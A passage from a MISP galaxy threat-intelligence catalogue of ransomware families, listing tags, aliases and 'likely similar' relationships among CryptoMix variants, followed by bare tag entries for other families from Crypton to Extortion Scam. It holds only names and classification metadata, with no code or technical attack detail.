  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-System

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-System"

CryptoMix-System is also known as:

  • System CryptoMix

CryptoMix-System has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Tastylock

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Tastylock"

CryptoMix-Tastylock is also known as:

  • Tastylock CryptoMix

CryptoMix-Tastylock has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Test

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Test"

CryptoMix-Test is also known as:

  • Test CryptoMix

CryptoMix-Test has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Wallet

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Wallet"

CryptoMix-Wallet has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

Cryptomix-WORK

Ransomware

The tag is: misp-galaxy:ransomware="Cryptomix-WORK"

Cryptomix-WORK is also known as:

  • WORK CryptoMix

Cryptomix-WORK has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-x1881

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-x1881"

CryptoMix-x1881 is also known as:

  • x1881 CryptoMix

CryptoMix-x1881 has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-XZZX

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-XZZX"

CryptoMix-XZZX is also known as:

  • XZZX CryptoMix

CryptoMix-XZZX has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Zayka" with estimative-language:likelihood-probability="likely"

CryptoMix-Zayka

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix-Zayka"

CryptoMix-Zayka is also known as:

  • Zayka CryptoMix

CryptoMix-Zayka has relationships with:

  • similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Coban" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-DLL" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Empty" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Error" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Exte" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-FILE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-MOLE66" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Noob" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Ogonia" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Pirate" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Revenge" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-SERVER" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Shark" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-System" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Tastylock" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Test" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-Wallet" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="Cryptomix-WORK" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-x1881" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:ransomware="CryptoMix-XZZX" with estimative-language:likelihood-probability="likely"

Crypton

Ransomware

The tag is: misp-galaxy:ransomware="Crypton"

CryptoPatronum

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPatronum"

CryptoPokemon

Ransomware

The tag is: misp-galaxy:ransomware="CryptoPokemon"

CryptorBit

Ransomware

The tag is: misp-galaxy:ransomware="CryptorBit"

CryptoShield 2.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoShield 2.0"

CryptoSpider

Ransomware

The tag is: misp-galaxy:ransomware="CryptoSpider"

CryptoViki

Ransomware

The tag is: misp-galaxy:ransomware="CryptoViki"

Cryptre

Ransomware

The tag is: misp-galaxy:ransomware="Cryptre"

CrypTron

Ransomware

The tag is: misp-galaxy:ransomware="CrypTron"

Crysis XTBL

Ransomware

The tag is: misp-galaxy:ransomware="Crysis XTBL"

Crystal

Ransomware

The tag is: misp-galaxy:ransomware="Crystal"

CrystalCrypt

Ransomware

The tag is: misp-galaxy:ransomware="CrystalCrypt"

CryTekk

Ransomware

The tag is: misp-galaxy:ransomware="CryTekk"

CSP

Ransomware

The tag is: misp-galaxy:ransomware="CSP"

CTB-Locker Original

Ransomware

The tag is: misp-galaxy:ransomware="CTB-Locker Original"

CTF

Ransomware

The tag is: misp-galaxy:ransomware="CTF"

Curumim

Ransomware

The tag is: misp-galaxy:ransomware="Curumim"

CVLocker

Ransomware

The tag is: misp-galaxy:ransomware="CVLocker"

Cyber Police HT

Ransomware

The tag is: misp-galaxy:ransomware="Cyber Police HT"

CyberDrill2

Ransomware

The tag is: misp-galaxy:ransomware="CyberDrill2"

CyberResearcher

Ransomware

The tag is: misp-galaxy:ransomware="CyberResearcher"

CyberSCCP

Ransomware

The tag is: misp-galaxy:ransomware="CyberSCCP"

CyberSoldier

Ransomware

The tag is: misp-galaxy:ransomware="CyberSoldier"

Cyclone

Ransomware

The tag is: misp-galaxy:ransomware="Cyclone"

CypherPy

Ransomware

The tag is: misp-galaxy:ransomware="CypherPy"

Cyspt

Ransomware

The tag is: misp-galaxy:ransomware="Cyspt"

Czech

Ransomware

The tag is: misp-galaxy:ransomware="Czech"

D00mEd

Ransomware

The tag is: misp-galaxy:ransomware="D00mEd"

D2+D

Ransomware

The tag is: misp-galaxy:ransomware="D2+D"

DarkKomet

Ransomware

The tag is: misp-galaxy:ransomware="DarkKomet"

DarkLocker

Ransomware

The tag is: misp-galaxy:ransomware="DarkLocker"

DarkoderCryptor

Ransomware

The tag is: misp-galaxy:ransomware="DarkoderCryptor"

DataKeeper

Ransomware

The tag is: misp-galaxy:ransomware="DataKeeper"

Datebatut

Ransomware

The tag is: misp-galaxy:ransomware="Datebatut"

DCRTR

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR"

DCRTR-WDM

Ransomware

The tag is: misp-galaxy:ransomware="DCRTR-WDM"

DCry

Ransomware

The tag is: misp-galaxy:ransomware="DCry"

DDE

Ransomware

The tag is: misp-galaxy:ransomware="DDE"

DeadSec-Crypto

Ransomware

The tag is: misp-galaxy:ransomware="DeadSec-Crypto"

DeathHiddenTear (Large&Small HT) >

Ransomware

The tag is: misp-galaxy:ransomware="DeathHiddenTear (Large&Small HT) > "

DeathNote

Ransomware

The tag is: misp-galaxy:ransomware="DeathNote"

DeathRansom

Ransomware

The tag is: misp-galaxy:ransomware="DeathRansom"

DecryptIomega

Ransomware

The tag is: misp-galaxy:ransomware="DecryptIomega"

Decryption Assistant

Ransomware

The tag is: misp-galaxy:ransomware="Decryption Assistant"

DecService

Ransomware

The tag is: misp-galaxy:ransomware="DecService"

DecYourData

Ransomware

The tag is: misp-galaxy:ransomware="DecYourData"

Defender

Ransomware

The tag is: misp-galaxy:ransomware="Defender"

Defray (Glushkov)

Ransomware

The tag is: misp-galaxy:ransomware="Defray (Glushkov)"

Deos

Ransomware

The tag is: misp-galaxy:ransomware="Deos"

Desktop

Ransomware

The tag is: misp-galaxy:ransomware="Desktop"

Diamond

Ransomware

The tag is: misp-galaxy:ransomware="Diamond"

DilmaLocker

Ransomware

The tag is: misp-galaxy:ransomware="DilmaLocker"

Dishwasher

Ransomware

The tag is: misp-galaxy:ransomware="Dishwasher"

District

Ransomware

The tag is: misp-galaxy:ransomware="District"

DMA Locker 1.0-2.0-3.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 1.0-2.0-3.0"

DMA Locker 4.0

Ransomware

The tag is: misp-galaxy:ransomware="DMA Locker 4.0"

DMALocker Imposter

Ransomware

The tag is: misp-galaxy:ransomware="DMALocker Imposter"

Dodger

Ransomware

The tag is: misp-galaxy:ransomware="Dodger"

DolphinTear

Ransomware

The tag is: misp-galaxy:ransomware="DolphinTear"

Donald Trump

Ransomware

The tag is: misp-galaxy:ransomware="Donald Trump"

Donation1

Ransomware

The tag is: misp-galaxy:ransomware="Donation1"

Done

Ransomware

The tag is: misp-galaxy:ransomware="Done"

Dont_Worry

Ransomware

The tag is: misp-galaxy:ransomware="Dont_Worry"

DotNoData

Ransomware

The tag is: misp-galaxy:ransomware="DotNoData"

DotZeroCMD

Ransomware

The tag is: misp-galaxy:ransomware="DotZeroCMD"

Dr. Fucker

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Fucker"

Dr. Jimbo

Ransomware

The tag is: misp-galaxy:ransomware="Dr. Jimbo"

Drakos

Ransomware

The tag is: misp-galaxy:ransomware="Drakos"

DriedSister

Ransomware

The tag is: misp-galaxy:ransomware="DriedSister"

Dviide

Ransomware

The tag is: misp-galaxy:ransomware="Dviide"

eBayWall

Ransomware

The tag is: misp-galaxy:ransomware="eBayWall"

EbolaRnsmwr

Ransomware

The tag is: misp-galaxy:ransomware="EbolaRnsmwr"

ECLR

Ransomware

The tag is: misp-galaxy:ransomware="ECLR"

EggLocker

Ransomware

The tag is: misp-galaxy:ransomware="EggLocker"

Ekati demo tool

Ransomware

The tag is: misp-galaxy:ransomware="Ekati demo tool"

Enc1

Ransomware

The tag is: misp-galaxy:ransomware="Enc1"

EncoderCSL

Ransomware

The tag is: misp-galaxy:ransomware="EncoderCSL"

EnCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnCrypt"

EncryptedBatch

Ransomware

The tag is: misp-galaxy:ransomware="EncryptedBatch"

EncryptServer2018

Ransomware

The tag is: misp-galaxy:ransomware="EncryptServer2018"

EnybenyCrypt

Ransomware

The tag is: misp-galaxy:ransomware="EnybenyCrypt"

EOEO

Ransomware

The tag is: misp-galaxy:ransomware="EOEO"

Epoblockl

Ransomware

The tag is: misp-galaxy:ransomware="Epoblockl"

Erica2020

Ransomware

The tag is: misp-galaxy:ransomware="Erica2020"

Eris

Ransomware

The tag is: misp-galaxy:ransomware="Eris"

Estemani

Ransomware

The tag is: misp-galaxy:ransomware="Estemani"

Eternal

Ransomware

The tag is: misp-galaxy:ransomware="Eternal"

Eternity

Ransomware

The tag is: misp-galaxy:ransomware="Eternity"

Euclid

Ransomware

The tag is: misp-galaxy:ransomware="Euclid"

Evasive HT

Ransomware

The tag is: misp-galaxy:ransomware="Evasive HT"

Evolution

Ransomware

The tag is: misp-galaxy:ransomware="Evolution"

Executioner

Ransomware

The tag is: misp-galaxy:ransomware="Executioner"

ExecutionerPlus

Ransomware

The tag is: misp-galaxy:ransomware="ExecutionerPlus"

Exocrypt XTC

Ransomware

The tag is: misp-galaxy:ransomware="Exocrypt XTC"

ExoLock

Ransomware

The tag is: misp-galaxy:ransomware="ExoLock"

ExpBoot

Ransomware

The tag is: misp-galaxy:ransomware="ExpBoot"

Explorer

Ransomware

The tag is: misp-galaxy:ransomware="Explorer"

Extortion Scam

Ransomware

